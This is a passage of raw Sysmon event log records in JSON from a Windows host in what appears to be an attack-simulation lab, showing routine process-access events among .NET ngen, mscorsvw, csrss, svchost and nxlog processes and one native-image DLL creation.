07:01:20.575","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1340-5F25-0000-00108C6C0D00}","TargetProcessId":"4848","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7987,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:20.575\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1340-5F25-0000-00108C6C0D00}\r\nTargetProcessId: 4848\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:20.575","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1340-5F25-0000-00108C6C0D00}","TargetProcessId":"4848","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7988,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:20.591\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1340-5F25-0000-00108C6C0D00}\r\nTargetProcessId: 4848\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:20.591","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1340-5F25-0000-00108C6C0D00}","TargetProcessId":"4848","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7989,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:20.622\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1340-5F25-0000-001008700D00}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:20.622","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1340-5F25-0000-001008700D00}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7990,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:20.622\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1340-5F25-0000-001008700D00}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:20.622","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1340-5F25-0000-001008700D00}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7991,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:20.638\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1340-5F25-0000-001008700D00}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:20.638","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1340-5F25-0000-001008700D00}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7992,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:20.638\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:20.638","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7993,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:01:20.669\r\nProcessGuid: {E2A3D6B1-1340-5F25-0000-001008700D00}\r\nProcessId: 2868\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b34-0\\PresentationFramework-SystemData.dll\r\nCreationUtcTime: 2020-08-01 07:01:20.669","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:01:20.669","ProcessGuid":"{E2A3D6B1-1340-5F25-0000-001008700D00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b34-0\\PresentationFramework-SystemData.dll","CreationUtcTime":"2020-08-01 07:01:20.669","EventReceivedTime":"2020-08-01 07:01:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7994,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:20.700\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1340-5F25-0000-001061740D00}\r\nTargetProcessId: 4116\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:20.700","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1340-5F25-0000-001061740D00}","TargetProcessId":"4116","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+